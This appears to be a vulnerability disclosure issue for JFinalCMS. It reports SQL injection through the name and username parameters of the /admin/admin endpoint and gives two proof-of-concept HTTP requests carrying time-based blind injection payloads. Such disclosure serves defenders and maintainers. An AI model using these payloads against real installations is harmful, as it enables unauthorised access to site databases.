There is a SQL injection vulnerability in the /admin/admin interface

There is an SQL injection vulnerability in the There is a SQL injection vulnerability in the /admin/admin interface interface, where the title content can be directly concatenated into an SQL statement from the frontend, resulting in SQL injection.

The name and username field is frontend controllable.
![输入图片说明](https://foruda.gitee.com/images/1719365695631494638/eb647fe2_5464533.png "屏幕截图")
You can concatenate SQL statements in the findPage method
![输入图片说明](https://foruda.gitee.com/images/1719365712771458893/45bbeb6f_5464533.png "屏幕截图")
POC1：
```
GET /admin/admin?name='+AND+(SELECT(SLEEP(5)))--+1234&username=123 HTTP/1.1
Host: 127.0.0.1:58888
sec-ch-ua: "Chromium";v="125", "Not.A/Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Nexus 4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: remember-me=dGVzdDoxNzIwMDEzODMyNzM0OjBjY2EyZWYzYjk5MDRiYzcyMGQwOWNkMWY5NjhkNmYz; JSESSIONID=node0r5z117x8d9wh4zoem0kr2dkl1.node0
Connection: keep-alive
```
![输入图片说明](https://foruda.gitee.com/images/1719365379341519073/e374747b_5464533.png "屏幕截图")

POC2:
```
GET /admin/admin?name=1&username='+AND+(SELECT+6576+FROM+(SELECT(SLEEP(10)))xxxx)--+1234 HTTP/1.1
Host: 127.0.0.1:58888
sec-ch-ua: "Chromium";v="125", "Not.A/Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Nexus 4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: remember-me=dGVzdDoxNzIwMDEzODMyNzM0OjBjY2EyZWYzYjk5MDRiYzcyMGQwOWNkMWY5NjhkNmYz; JSESSIONID=node0r5z117x8d9wh4zoem0kr2dkl1.node0; listQuery=name%3D%27+AND+%28SELECT+6331+FROM+%28SELECT%28SLEEP%285%29%29%29XVUk%29--+iALG%26username%3D123
Connection: keep-alive
```
![输入图片说明](https://foruda.gitee.com/images/1719365648516223055/51a23e17_5464533.png "屏幕截图")

樱木/JFinalCMS

内容风险标识

评论 (0)

樱木/JFinalCMS .gitee-modal { width: 500px !important; }

内容风险标识